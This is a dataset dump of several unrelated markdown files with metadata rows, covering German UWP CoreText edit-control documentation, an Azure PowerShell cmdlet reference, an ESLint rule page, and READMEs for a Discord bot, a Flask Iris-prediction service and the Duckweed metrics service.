Das Bearbeitungssteuerelement empfängt Text über die [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignisse, die generiert werden, wenn Benutzer mit Texteingabemethoden wie Tastaturen, Sprache oder IMEs interagieren.
Wenn Sie den Text im Bearbeitungs Steuerelement ändern, indem Sie z. b. Text in das Steuerelement einfügen, müssen Sie Windows Benachrichtigen, indem Sie [**notifytextchanged**](/uwp/api/windows.ui.text.core.coretexteditcontext.notifytextchanged)aufrufen.
Wenn der Textdienst den neuen Text erfordert, wird ein [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignis ausgelöst. Sie müssen den neuen Text in den **TextRequested**-Ereignishandler eingeben.
### <a name="accepting-text-updates"></a>Akzeptieren von Textupdates
Ihr Bearbeitungssteuerelement sollte in der Regel Textaktualisierungsanforderungen akzeptieren, da diese den Text darstellen, den der Benutzer eingeben möchte. Im [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignishandler werden die folgenden Aktionen vom Bearbeitungssteuerelement erwartet:
1. Einfügen des Texts, der in [**CoreTextTextUpdatingEventArgs.Text**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.text) an der Position angegeben wurde, die in [**CoreTextTextUpdatingEventArgs.Range**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.range) angegeben wurde
2. Platzieren Sie die Auswahl an der in [**coretexttextupdatingeventargs. newselection**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.newselection)angegebenen Position.
3. Benachrichtigen des Systems, dass das Update erfolgreich war, indem [**CoreTextTextUpdatingEventArgs.Result**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.result) auf [**CoreTextTextUpdatingResult.Succeeded**](/uwp/api/Windows.UI.Text.Core.CoreTextTextUpdatingResult) festgelegt wird
Dies ist beispielsweise der Zustand eines Bearbeitungssteuerelements, bevor der Benutzer „d“ eingibt. Die Einfügemarke liegt bei \[ 10, 10 \] .
![Screenshot eines textstreamdiagramms mit der Einfügemarke bei \[ 10, 10 \] , vor einer Einfügung](images/coretext/stream-3.png)
Wenn der Benutzer „d“ eingibt, wird ein [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignis mit den folgenden [**CoreTextTextUpdatingEventArgs**](/uwp/api/Windows.UI.Text.Core.CoreTextTextUpdatingEventArgs)-Daten ausgelöst:
- [**Range**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.range) = Bereich \[ 10, 10\]
- [**Text**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.text) = "d"
- [**Neuauswahl**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.newselection) = \[ 11, 11\]
Wenden Sie in Ihrem Bearbeitungssteuerelement die angegebenen Änderungen an, und legen Sie [**Result**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.result) auf **Succeeded** fest. Hier sehen Sie den Zustand des Steuerelements, nachdem die Änderungen angewendet wurden.
:::image type="content" source="images/coretext/stream-4.png" alt-text="Screenshot eines textstreamdiagramms, das die Einfügemarke bei \[ 11, 11 \] nach einer Einfügung anzeigt":::
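A minimal sketch of such a handler in C# (illustrative only; it assumes the control stores its text in a `StringBuilder` field named `_text` and tracks the selection in a `_selection` field, names that are not part of the API):
```csharp
private void EditContext_TextUpdating(CoreTextEditContext sender, CoreTextTextUpdatingEventArgs args)
{
    CoreTextRange range = args.Range;
    // Replace the characters in the requested range with the new text.
    _text.Remove(range.StartCaretPosition, range.EndCaretPosition - range.StartCaretPosition);
    _text.Insert(range.StartCaretPosition, args.Text);
    // Move the local selection to where the text service asked it to be.
    _selection = args.NewSelection;
    // Report success so the text service stays in sync with the control.
    args.Result = CoreTextTextUpdatingResult.Succeeded;
}
```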
### <a name="rejecting-text-updates"></a>Ablehnen von Textupdates
Manchmal können Textaktualisierungen nicht angewendet werden, da sich der angeforderte Bereich in einem Bereich des Bearbeitungssteuerelements befindet, der nicht geändert werden darf. In diesem Fall sollten Sie keine Änderungen anwenden. Benachrichtigen Sie stattdessen das System, dass die Aktualisierung fehlgeschlagen ist, indem Sie [**CoreTextTextUpdatingEventArgs.Result**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.result) auf [**CoreTextTextUpdatingResult.Failed**](/uwp/api/Windows.UI.Text.Core.CoreTextTextUpdatingResult) festlegen.
Angenommen, Sie haben ein Bearbeitungssteuerelement, das nur eine E-Mail-Adresse akzeptiert. Leerzeichen sollten zurückgewiesen werden, da E-Mail-Adressen keine Leerzeichen enthalten dürfen. Wenn daher [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignisse für die Leertaste ausgelöst werden, können Sie [**Result**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.result) im Bearbeitungssteuerelement einfach auf **Failed** festlegen.
### <a name="notifying-text-changes"></a>Benachrichtigen über Textänderungen
Manchmal nimmt das Bearbeitungssteuerelement Änderungen am Text vor, wenn beispielsweise Text eingefügt oder automatische korrigiert wird. In diesen Fällen müssen Sie die Textdienste über diese Änderungen benachrichtigen, indem Sie die [**NotifyTextChanged**](/uwp/api/windows.ui.text.core.coretexteditcontext.notifytextchanged)-Methode aufrufen.
Dies ist beispielsweise der Zustand eines Bearbeitungssteuerelements, bevor der Benutzer „World“ einfügt. Die Einfügemarke ist \[ 6, 6 \] .
![Screenshot eines textstreamdiagramms mit der Einfügemarke bei \[ 6, 6 \] , vor einer Einfügung](images/coretext/stream-5.png)
Der Benutzer führt die Einfüge Aktion und das Bearbeitungs Steuerelement aus, nachdem die Änderungen angewendet wurden:
:::image type="content" source="images/coretext/stream-4.png" alt-text="Screenshot eines textstreamdiagramms, das die Einfügemarke bei \[ 11, 11 \] nach einer Einfügung anzeigt":::
In diesem Fall rufen Sie [**NotifyTextChanged**](/uwp/api/windows.ui.text.core.coretexteditcontext.notifytextchanged) mit den folgenden Argumenten auf:
- *modifiedrange* = \[ 6, 6\]
- *newLength* = 5
- *Neuauswahl* = \[ 11, 11\]
Es folgt mindestens ein [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignis, das Sie zum Aktualisieren des Texts behandeln, mit dem die Textdienste arbeiten.
### <a name="overriding-text-updates"></a>Überschreiben von Textaktualisierungen
Vielleicht möchten Sie in Ihrem Bearbeitungssteuerelement eine Textaktualisierung überschreiben, um AutoKorrektur-Funktionen bereitzustellen.
Angenommen, Sie haben ein Bearbeitungssteuerelement, das eine Korrekturfunktion bereitstellt, das kontrahierte Schreibweisen formalisiert. Dies ist der Zustand des Bearbeitungssteuerelements, bevor der Benutzer die Leertaste drückt, um die Korrektur auszulösen. Die Einfügemarke ist \[ 3, 3 \] .
![Screenshot eines textstreamdiagramms mit der Einfügemarke bei \[ 3, 3 \] , vor einer Einfügung](images/coretext/stream-6.png)
Der Benutzer drückt die Leertaste, und es wird ein entsprechendes [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignis ausgelöst. Das Bearbeitungssteuerelement akzeptiert die Textaktualisierung. Dies ist der Zustand des Bearbeitungssteuerelements für einen kurzen Moment, bevor die Korrektur abgeschlossen ist. Die Einfügemarke ist \[ 4, 4 \] .
![Screenshot eines textstreamdiagramms, das die Einfügemarke bei \[ 4, 4 \] nach einer Einfügung anzeigt](images/coretext/stream-7.png)
Außerhalb des [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignishandlers nimmt das Bearbeitungssteuerelement die folgende Korrektur vor. Dies ist der Zustand des Bearbeitungssteuerelements nach Abschluss der Korrektur. Die Einfügemarke ist \[ 5, 5 \] .
![Screenshot eines textstreamdiagramms mit der Einfügemarke bei \[ 5, 5\]](images/coretext/stream-8.png)
In diesem Fall rufen Sie [**NotifyTextChanged**](/uwp/api/windows.ui.text.core.coretexteditcontext.notifytextchanged) mit den folgenden Argumenten auf:
- *modifiedrange* = \[ 1, 2\]
- *newLength* = 2
- *Neuauswahl* = \[ 5, 5\]
Es folgt mindestens ein [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignis, das Sie zum Aktualisieren des Texts behandeln, mit dem die Textdienste arbeiten.
### <a name="providing-requested-text"></a>Bereitstellen von angefordertem Text
Es ist wichtig, dass Textdienste über den richtigen Text verfügen, damit Funktionen wie AutoKorrektur oder Vorhersage bereitgestellt werden können, insbesondere bei Text, der im Bearbeitungssteuerelement bereits durch Laden eines Dokuments vorhanden war, oder bei Text, der vom Bearbeitungssteuerelement eingefügt wird, wie in den vorherigen Abschnitten erläutert. Wenn ein [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignis ausgelöst wird, müssen Sie daher stets den Text bereitstellen, der sich zurzeit im Bearbeitungssteuerelement für den angegebenen Bereich befindet.
Gelegentlich gibt [**Range**](/uwp/api/windows.ui.text.core.coretexttextrequest.range) in [**CoreTextTextRequest**](/uwp/api/Windows.UI.Text.Core.CoreTextTextRequest) einen Bereich an, den das Bearbeitungssteuerelement nicht in der Form aufnehmen kann, in der dieser vorliegt. Beispielsweise ist **Range** zum Zeitpunkt des [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignisses größer als das Bearbeitungssteuerelement, oder das Ende von **Range** liegt außerhalb des zulässigen Bereichs. In diesen Fällen sollten Sie zu einem Bereich zurückkehren, der sinnvoll ist. In der Regel ist dies eine Untergruppe des angeforderten Bereichs.
## <a name="related-articles"></a>Verwandte Artikel
### <a name="samples"></a>Beispiele
- [Beispiel für ein benutzerdefiniertes Bearbeitungssteuerelement](https://github.com/Microsoft/Windows-universal-samples/tree/master/Samples/CustomEditControl)
### <a name="archive-samples"></a>Archivbeispiele
- [Beispiel für die XAML-Textbearbeitung](https://github.com/microsoftarchive/msdn-code-gallery-microsoft/tree/411c271e537727d737a53fa2cbe99eaecac00cc0/Official%20Windows%20Platform%20Sample/Windows%208%20app%20samples/%5BVB%5D-Windows%208%20app%20samples/VB/Windows%208%20app%20samples/XAML%20text%20editing%20sample%20(Windows%208))
| 98.728814 | 832 | 0.787067 | deu_Latn | 0.977768 |
9799db46b2e346aab389d53734fcf9ff7771f95e | 1,919 | md | Markdown | azureps-cmdlets-docs/ResourceManager/AzureRM.Network/v0.9.8/Get-AzureNetworkSecurityGroup.md | Evgenii011/azure-docs-powershell | 30e804249e1fb7af82ea9b01d7bdecb33ec238db | [
"CC-BY-4.0",
"MIT"
] | 2 | 2021-04-14T11:42:58.000Z | 2021-05-23T22:43:42.000Z | azureps-cmdlets-docs/ResourceManager/AzureRM.Network/v0.9.8/Get-AzureNetworkSecurityGroup.md | Evgenii011/azure-docs-powershell | 30e804249e1fb7af82ea9b01d7bdecb33ec238db | [
"CC-BY-4.0",
"MIT"
] | null | null | null | azureps-cmdlets-docs/ResourceManager/AzureRM.Network/v0.9.8/Get-AzureNetworkSecurityGroup.md | Evgenii011/azure-docs-powershell | 30e804249e1fb7af82ea9b01d7bdecb33ec238db | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-04-16T03:17:57.000Z | 2019-04-16T03:17:57.000Z | ---
external help file: Microsoft.Azure.Commands.Network.dll-Help.xml
online version:
schema: 2.0.0
ms.assetid: EF39FE54-FC9B-46AB-886F-0FACF66BAA1D
---
# Get-AzureNetworkSecurityGroup
## SYNOPSIS
Gets a network security group.
## SYNTAX
```
Get-AzureNetworkSecurityGroup [-Name <String>] [-ResourceGroupName <String>] [-Profile <AzureProfile>]
[<CommonParameters>]
```
## DESCRIPTION
The **Get-AzureNetworkSecurityGroup** cmdlet gets an Azure network security group.
## EXAMPLES
### Example 1: Get a network security group
The following call is an illustrative sketch; "MyNSG" and "MyResourceGroup" are placeholder names, not values from the original documentation.
```
PS C:\> Get-AzureNetworkSecurityGroup -Name "MyNSG" -ResourceGroupName "MyResourceGroup"
```
## PARAMETERS
### -Name
Specifies the name of the network security group to get.
```yaml
Type: String
Parameter Sets: (All)
Aliases: ResourceName
Required: False
Position: Named
Default value: None
Accept pipeline input: True (ByPropertyName)
Accept wildcard characters: False
```
### -Profile
Specifies an Azure profile.
```yaml
Type: AzureProfile
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -ResourceGroupName
Specifies the name of the resource group that contains the network security group to get.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: None
Accept pipeline input: True (ByPropertyName)
Accept wildcard characters: False
```
### CommonParameters
This cmdlet supports the common parameters: -Debug, -ErrorAction, -ErrorVariable, -InformationAction, -InformationVariable, -OutVariable, -OutBuffer, -PipelineVariable, -Verbose, -WarningAction, and -WarningVariable. For more information, see about_CommonParameters (http://go.microsoft.com/fwlink/?LinkID=113216).
## INPUTS
## OUTPUTS
## NOTES
## RELATED LINKS
[New-AzureNetworkSecurityGroup](./New-AzureNetworkSecurityGroup.md)
[Remove-AzureNetworkSecurityGroup](./Remove-AzureNetworkSecurityGroup.md)
[Set-AzureNetworkSecurityGroup](./Set-AzureNetworkSecurityGroup.md)
| 20.2 | 314 | 0.766545 | yue_Hant | 0.46686 |
979a079ac3518f9a2fdaadf1faf91b6573cecec1 | 671 | md | Markdown | README.md | afrojun/ruby-cli-boilerplate | 75e2ca96f6bed85545de2c13af21cee3c6bdbf3f | [
"MIT"
] | null | null | null | README.md | afrojun/ruby-cli-boilerplate | 75e2ca96f6bed85545de2c13af21cee3c6bdbf3f | [
"MIT"
] | null | null | null | README.md | afrojun/ruby-cli-boilerplate | 75e2ca96f6bed85545de2c13af21cee3c6bdbf3f | [
"MIT"
] | null | null | null | # Ruby CLI Boilerplate
## Functionality
This is a Ruby 3.1 CLI boilerplate to help accelerate the initial setup of CLI projects.
## Install
Make sure you have Ruby 3.1 installed (I use [asdf](https://asdf-vm.com/)), then run:
```sh
bundle
```
## Usage
```sh
# By default we will run the total views aggregator
bin/run.rb command something_important
# Specify the following options to do something different
bin/run.rb command something_important -c foo
```
To get a full list of available commands, or help on a specific one, use the `--help` or `-h` flag:
```sh
bin/run.rb -h
```
## Tests
```sh
rspec
```
A coverage report will be generated after the tests run.
| 17.657895 | 98 | 0.71386 | eng_Latn | 0.993782 |
979a23f99a9a8a3f74d4920ae166de7fae81af6e | 1,233 | md | Markdown | README.md | yashppawar/Thwipper-bot | 0187061bd762deb83c8371e2874d62677cca7847 | [
"MIT"
] | 1 | 2022-02-13T14:11:40.000Z | 2022-02-13T14:11:40.000Z | README.md | yashppawar/Thwipper-bot | 0187061bd762deb83c8371e2874d62677cca7847 | [
"MIT"
] | null | null | null | README.md | yashppawar/Thwipper-bot | 0187061bd762deb83c8371e2874d62677cca7847 | [
"MIT"
] | null | null | null | # Thwipper-bot
_<h2>🕷 What is Thwipper? 🕷</h2>_
Everything you need to keep the members of your server entertained, this bot has it.
Thwipper is inspired by my favorite fictional character, Spider-Man. Its name is the onomatopoeia of Spider-Man using his web-shooters. Thwip!<br>
Prefixes => `[t!], [ _ ], [thwip] [thwipper]`<br>
<!-- <img src="\spiderman.png"></img> -->
<img src="https://wallpapercave.com/wp/wp7936066.jpg"></img>
_<h2>🕷 Features 🕷</h2>_
_IMDb_<br>
_Quips_<br>
_Reddit_<br>
_Google_<br>
_Wikipedia_<br>
_Music Player_<br>
_Conduct Polls_<br>
_Python & MySQL Shells_<br>
_Date, Time & Calendar_ <br>
_Encryption & Decryption_<br><br>
_MORE FEATURES COMING SOON_
_<h2>🕷 Note 🕷</h2>_
Have the bot token, SQL password, reddit client id, client secret and the user agent in a .py file in the same directory as `main.py`<br>
Make sure you have all the dependencies installed that are required for this bot to work.<br>
Especially `ffmpeg` as it is required to play music.
<a href="https://ffmpeg.org/download.html">Install ffmpeg here</a><br>
To install other dependencies required, use `pip install [dependency]`.<br>
P.S. Thanks to Alvin for helping out with web scraping.<br>
https://github.com/alvinbengeorge | 38.53125 | 147 | 0.735604 | eng_Latn | 0.938447 |
979a9652913afac02a3c7e62b17fa73768f4eb50 | 145 | md | Markdown | README.md | elionoula/PythonCalculatorHW | b4e75d8ebae7e60fc50c2c96b2df30790a4a5dff | [
"MIT"
] | null | null | null | README.md | elionoula/PythonCalculatorHW | b4e75d8ebae7e60fc50c2c96b2df30790a4a5dff | [
"MIT"
] | null | null | null | README.md | elionoula/PythonCalculatorHW | b4e75d8ebae7e60fc50c2c96b2df30790a4a5dff | [
"MIT"
] | null | null | null | # PythonCalculatorHW
This is an individual homework assignment for the IS601 course at NJIT, under the instruction of Professor Keith Williams.
| 36.25 | 122 | 0.827586 | eng_Latn | 0.998316 |
979ae747215074b254f07538d4d51d880e24e822 | 1,211 | md | Markdown | docs/zh-cn/kmarkdown.md | QRrui/api-docs | fe7838aebba45ddb64cd8962b3c7d571c356c1ae | [
"MIT"
] | null | null | null | docs/zh-cn/kmarkdown.md | QRrui/api-docs | fe7838aebba45ddb64cd8962b3c7d571c356c1ae | [
"MIT"
] | null | null | null | docs/zh-cn/kmarkdown.md | QRrui/api-docs | fe7838aebba45ddb64cd8962b3c7d571c356c1ae | [
"MIT"
] | null | null | null | # KMarkdown
To support users' complex messaging needs and provide a better user experience when sending chat messages, we introduced markdown. On top of the standard markdown specification, we have added some adaptations and extensions of our own. To distinguish it from markdown, we refer to it as KMarkdown throughout this document.
We only support the syntax listed in this document. If some syntax exists in markdown but is not mentioned here, it is currently unsupported and we recommend not using it.
We also provide a KMarkdown message editor for convenient visual editing: [click to use it](https://kaiheila.cn/tools/message-builder.html#/kmarkdown)
## Main Format Rules
1. Most of the syntax comes from standard markdown. Unless otherwise noted, just follow markdown syntax.
2. Most custom syntax follows this format: `(tagName)value(tagName)[attributes]`. If a tag has no attributes, `[attributes]` is omitted.
3. Most tags support line breaks.
|Format|Syntax Source|Description|
|--|--|--|
|`**bold text**`|markdown|Bold|
|`*italic text*`|markdown|Italic|
|`***bold italic***`|markdown|Bold italic|
|`~~strikethrough~~`|markdown|Strikethrough|
|`[link text](link url)`|markdown|Link; only http and https links are allowed|
|`---`|markdown|Divider|
|`> hello world`|markdown|Blockquote: continues across line breaks until two consecutive newlines (\n\n) are encountered; those two newlines are not rendered as line breaks|
|`(ins)underlined content(ins)`|custom|Underline|
|`(spl)spoiler(spl)`|custom|The content is hidden by default and is only shown after the user clicks it|
|`:emoji:`|emoji|Basically consistent with the emoji [shortcode](https://www.webfx.com/tools/emoji-cheat-sheet/) notation|
|`(emj)server emoji name(emj)[server emoji id]`|custom|Server emoji; requires permission to send the server's emoji|
|`(chn)channel id(chn)`|custom|Channel; mentions a channel|
|`(met)user id/here/all(met)`|custom|@user; `all` mentions all users, `here` mentions all online users|
|`(rol)role id(rol)`|custom|@mentions all users with the given role|
|``` `inline code` ```|markdown|Inline code|
|` ```language\n ``` `|markdown|Code block|
|`\special character`|markdown|Escape, e.g., to display characters that would otherwise be parsed as syntax literally|
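For illustration, a single message can combine several of these tags (the mention target is a placeholder):
```
**bold** *italic* (ins)underline(ins) (spl)spoiler(spl) :smile: (met)here(met)
```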
| 34.6 | 129 | 0.712634 | yue_Hant | 0.730289 |
979bdf2c90c0e6216ea5b7099e45f7cf4a62fc35 | 3,389 | md | Markdown | docs/8.0.0/rules/prefer-promise-reject-errors.md | stephenwade/website | 654ee967e967f7d54899285f140866d39fa58c91 | [
"MIT"
] | 65 | 2015-05-18T12:57:43.000Z | 2019-05-17T16:36:07.000Z | docs/8.0.0/rules/prefer-promise-reject-errors.md | stephenwade/website | 654ee967e967f7d54899285f140866d39fa58c91 | [
"MIT"
] | 391 | 2015-01-18T01:08:56.000Z | 2019-07-12T19:22:09.000Z | docs/8.0.0/rules/prefer-promise-reject-errors.md | stephenwade/website | 654ee967e967f7d54899285f140866d39fa58c91 | [
"MIT"
] | 219 | 2015-01-24T20:36:38.000Z | 2019-07-07T04:14:06.000Z | ---
title: prefer-promise-reject-errors - Rules
layout: doc
edit_link: https://github.com/eslint/eslint/edit/master/docs/rules/prefer-promise-reject-errors.md
rule_type: suggestion
---
<!-- Note: No pull requests accepted for this file. See README.md in the root directory for details. -->
# require using Error objects as Promise rejection reasons (prefer-promise-reject-errors)
It is considered good practice to only pass instances of the built-in `Error` object to the `reject()` function for user-defined errors in Promises. `Error` objects automatically store a stack trace, which can be used to debug an error by determining where it came from. If a Promise is rejected with a non-`Error` value, it can be difficult to determine where the rejection occurred.
## Rule Details
This rule aims to ensure that Promises are only rejected with `Error` objects.
## Options
This rule takes one optional object argument:
* `allowEmptyReject: true` (`false` by default) allows calls to `Promise.reject()` with no arguments.
Examples of **incorrect** code for this rule:
```js
/*eslint prefer-promise-reject-errors: "error"*/
Promise.reject("something bad happened");
Promise.reject(5);
Promise.reject();
new Promise(function(resolve, reject) {
reject("something bad happened");
});
new Promise(function(resolve, reject) {
reject();
});
```
Examples of **correct** code for this rule:
```js
/*eslint prefer-promise-reject-errors: "error"*/
Promise.reject(new Error("something bad happened"));
Promise.reject(new TypeError("something bad happened"));
new Promise(function(resolve, reject) {
reject(new Error("something bad happened"));
});
var foo = getUnknownValue();
Promise.reject(foo);
```
Examples of **correct** code for this rule with the `allowEmptyReject: true` option:
```js
/*eslint prefer-promise-reject-errors: ["error", {"allowEmptyReject": true}]*/
Promise.reject();
new Promise(function(resolve, reject) {
reject();
});
```
## Known Limitations
Due to the limits of static analysis, this rule cannot guarantee that you will only reject Promises with `Error` objects. While the rule will report cases where it can guarantee that the rejection reason is clearly not an `Error`, it will not report cases where there is uncertainty about whether a given reason is an `Error`. For more information on this caveat, see the [similar limitations](no-throw-literal#known-limitations) in the `no-throw-literal` rule.
To avoid conflicts between rules, this rule does not report non-error values used in `throw` statements in async functions, even though these lead to Promise rejections. To lint for these cases, use the [`no-throw-literal`](https://eslint.org/docs/rules/no-throw-literal) rule.
## When Not To Use It
If you're using custom non-error values as Promise rejection reasons, you can turn off this rule.
## Further Reading
* [`no-throw-literal`](https://eslint.org/docs/rules/no-throw-literal)
* [Warning: a promise was rejected with a non-error](http://bluebirdjs.com/docs/warning-explanations.html#warning-a-promise-was-rejected-with-a-non-error)
## Version
This rule was introduced in ESLint 3.14.0.
## Resources
* [Rule source](https://github.com/eslint/eslint/tree/master/lib/rules/prefer-promise-reject-errors.js)
* [Documentation source](https://github.com/eslint/eslint/tree/master/docs/rules/prefer-promise-reject-errors.md)
| 34.938144 | 461 | 0.752729 | eng_Latn | 0.97669 |
979be28979ffc32ef09ae12817778748269866c9 | 4,541 | md | Markdown | README.md | patharanordev/simple-ml-as-a-services | fa08daa48176fa161487a025c361958ca61495b1 | [
"MIT"
] | 6 | 2020-11-08T06:18:08.000Z | 2021-11-16T13:02:45.000Z | README.md | patharanordev/simple-ml-as-a-services | fa08daa48176fa161487a025c361958ca61495b1 | [
"MIT"
] | null | null | null | README.md | patharanordev/simple-ml-as-a-services | fa08daa48176fa161487a025c361958ca61495b1 | [
"MIT"
] | null | null | null | # Simple Machine Learning as a Service (MLaaS)
Let's predict `Iris` species from Iris's metrics!!!

## Iris's species

## Iris's metrics
- Sepal length
- Sepal width
- Petal length
- Petal width
- Species
note :
- Sepal(กลีบเลี้ยง)
- Petal(กลีบดอก)

## Installation
```bash
pip install -r requirements.txt
```
## Create Simple model to predict Iris
Load Iris data set from Sci-Kit learn datasets
Ref. [Jupyter notebook](create-model.ipynb)
```py
from sklearn.datasets import load_iris
iris = load_iris()
X, y = iris['data'], iris['target']
```
### Reshape data
```py
from sklearn.model_selection import train_test_split
import numpy as np
dataset = np.hstack((X, y.reshape(-1,1)))
np.random.shuffle(dataset)
X_train, X_test, y_train, y_test = train_test_split(dataset[:,:4],
dataset[:,4],
test_size=0.2)
```
### Train model
In this example, I am using the `LogisticRegression` model:
```py
from sklearn.linear_model import LogisticRegression
model = LogisticRegression()
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
```
### Check accuracy
```py
from sklearn.metrics import accuracy_score
accuracy_score(y_test, y_pred)
```
### Save/Export the model
```py
import joblib
joblib.dump(model, 'iris.model')
```
## Simple Service with Flask
Example code:
```py
from flask import Flask, request
from flask_cors import CORS, cross_origin
import traceback
import sys
import joblib
import numpy as np
import os
app = Flask(__name__)
CORS(app)
model = None
@app.route('/iris', methods=['POST'])
@cross_origin()
def predict_species():
req = request.values['param']
inputs = np.array(req.split(','), dtype=np.float32).reshape(1,-1)
predict_target = model.predict(inputs)
if predict_target == 0:
return 'Setosa'
elif predict_target == 1:
return 'Versicolour'
else:
return 'Virginica'
if __name__ == '__main__':
try:
# Load model
model = joblib.load('iris.model')
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port, debug=True)
except Exception as ex:
traceback.print_exc(file=sys.stdout)
```
## Iris's metrics for testing
| Sepal length | Sepal width | Petal length | Petal width |
|--------------|-------------|--------------|-------------|
| 5.1 | 3.5 | 1.4 | 0.2 |
The model should predict `Setosa`.
An example request:

## Deploy the container to Heroku
Don't just run the service locally, let's deploy it to the public cloud!!!
### Install Heroku CLI
Please refer to https://devcenter.heroku.com/articles/heroku-cli
### Deployment
In the root of the project directory:
```bash
$ heroku container:login
# Login Succeeded
$ heroku create YOUR_SERVICE_NAME
# Creating ⬢ YOUR_SERVICE_NAME... done
# https://YOUR_SERVICE_NAME.herokuapp.com/ | https://git.heroku.com/YOUR_SERVICE_NAME.git
$ heroku container:push web --app YOUR_SERVICE_NAME
# === Building web (/YOUR_DIRECTORY/Dockerfile)
# Sending build context to Docker daemon 4.793MB
# Step 1/7 : FROM python:3.7-slim-buster
# ...
# latest: digest: sha256:c7548c...............................788c01 size: 2001
# Your image has been successfully pushed. You can now release it with the 'container:release' command.
$ heroku container:release web --app YOUR_SERVICE_NAME
# Releasing images web to YOUR_SERVICE_NAME... done
```
Check service status:
```bash
$ heroku logs --app YOUR_SERVICE_NAME
# CURRENT_DATE_TIME app[api]: Initial release by user [email protected]
# CURRENT_DATE_TIME app[api]: Release v1 created by user [email protected]
# ...
# CURRENT_DATE_TIME app[web.1]: * Environment: production
# CURRENT_DATE_TIME app[web.1]: WARNING: This is a development server. Do not use it in a production deployment.
# CURRENT_DATE_TIME app[web.1]: Use a production WSGI server instead.
# CURRENT_DATE_TIME app[web.1]: * Debug mode: on
# CURRENT_DATE_TIME app[web.1]: * Running on http://0.0.0.0:13879/ (Press CTRL+C to quit)
# CURRENT_DATE_TIME app[web.1]: * Restarting with stat
# CURRENT_DATE_TIME app[web.1]: * Debugger is active!
# CURRENT_DATE_TIME app[web.1]: * Debugger PIN: 281-003-968
# CURRENT_DATE_TIME heroku[web.1]: State changed from starting to up
```

## License
MIT | 23.407216 | 112 | 0.678265 | eng_Latn | 0.501396 |
979c0ee6675b29ee19174d3d888959637b288dec | 203 | md | Markdown | source/04_table_of_contents.md | addulac/phd | 6f661ef24e684f5a1d5ac2e2c110fcdfc06e3de4 | [
"MIT"
] | null | null | null | source/04_table_of_contents.md | addulac/phd | 6f661ef24e684f5a1d5ac2e2c110fcdfc06e3de4 | [
"MIT"
] | null | null | null | source/04_table_of_contents.md | addulac/phd | 6f661ef24e684f5a1d5ac2e2c110fcdfc06e3de4 | [
"MIT"
] | 1 | 2022-01-31T14:16:54.000Z | 2022-01-31T14:16:54.000Z | <!--\pagenumbering{gobble}-->
\tableofcontents
\newpage
\addcontentsline{toc}{chapter}{\listfigurename}
\listoffigures
\newpage
\addcontentsline{toc}{chapter}{\listtablename}
\listoftables
\newpage
| 13.533333 | 47 | 0.773399 | eng_Latn | 0.206411 |
979c930fef2c07c189d217672d7f90ea94bf6467 | 5,516 | md | Markdown | README.md | civiccc/duckweed | af9c7d19601cf0577ceaec9c551f35255a25046c | [
"MIT"
] | 1 | 2020-12-27T20:56:40.000Z | 2020-12-27T20:56:40.000Z | README.md | civiccc/duckweed | af9c7d19601cf0577ceaec9c551f35255a25046c | [
"MIT"
] | null | null | null | README.md | civiccc/duckweed | af9c7d19601cf0577ceaec9c551f35255a25046c | [
"MIT"
] | null | null | null | # Duckweed
<img src="https://github.com/causes/duckweed/raw/master/public/icon.png" />
Duckweed is a general-purpose metrics service that can be used to count things.
It consists of a simple Sinatra front-end and a Redis back-end. No
configuration is required to start tracking new events; just make an HTTP POST
request to a Duckweed instance with a new event name and Duckweed will start
tracking it. Metrics can be read back from Duckweed with simple HTTP requests.
Examples of things you can do with Duckweed:
* product metrics: gauge the success of your product by pinging Duckweed every
time a user takes a particular action on your site
* health metrics: count important application events to get immediate feedback
when something is broken
* A/B testing: use Duckweed to record the activity of experiment and control
groups
* application and server monitoring: count periodic events using Duckweed and
ask a health monitoring service like Nagios to check whether the event's
frequency is above the desired minimum threshold
Duckweed was designed to be simple, reliable and performant. It's easy to
set-up, and easy to use. It's particularly optimized for providing immediate,
real-time feedback to help you be aware of what's going on right now in your
app. It's not really intended to be a historical archive of all activity on
your site reaching far back in time.
## Integration with third-party services
* Geckoboard: Duckweed knows how to export results in JSON format suitable for
consumption by Geckboard (http://www.geckoboard.com/), which means you can
easily get insight into Duckweed's metrics in the form of graphical charts
and counters
* Pingdom: Duckweed can answer health probes from the Pingdom monitoring
service (http://pingdom.com/) so that you can be alerted as soon as an
important metric falls below some critical threshold
* Airbrake/Hoptoad: Duckweed can talk to the Airbrake error reporting and
aggregaton service (http://airbrakeapp.com/), so you'll find out if anything
ever goes wrong with Duckweed itself
## Data storage
Events are stored in buckets of minute, hour, and day granularity. As Duckweed
is all about getting insight into current application behavior,
minute-granularity data is kept for 2 days, hour-granularity data is kept for
about a month, and day-granularity data is kept for 5 years.
## Set-up
1. Clone Duckweed on a box that has Redis installed and running
2. Install its dependencies using `bundle install`
